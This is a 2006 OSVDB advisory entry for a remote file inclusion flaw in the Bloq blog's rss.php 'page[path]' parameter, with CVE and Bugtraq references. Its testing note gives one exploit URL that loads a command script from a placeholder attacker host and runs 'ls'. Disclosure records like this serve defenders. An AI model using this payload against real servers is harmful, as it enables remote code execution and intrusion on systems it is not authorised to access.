Bloq rss.php page[path] Variable Remote File Inclusion

2006-10-12T09:57:07
ID OSVDB:32430
Type osvdb
Reporter OSVDB
Modified 2006-10-12T09:57:07

Description

Manual Testing Notes

http://[target]/[path]/rss.php?page[path]=http://[attacker]/cmd.gif?&cmd=ls

References:

Related OSVDB ID: 32428 Related OSVDB ID: 32429 Related OSVDB ID: 32431 Related OSVDB ID: 32432 Related OSVDB ID: 32433 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0204.html ISS X-Force ID: 29585 CVE-2006-6592 Bugtraq ID: 20512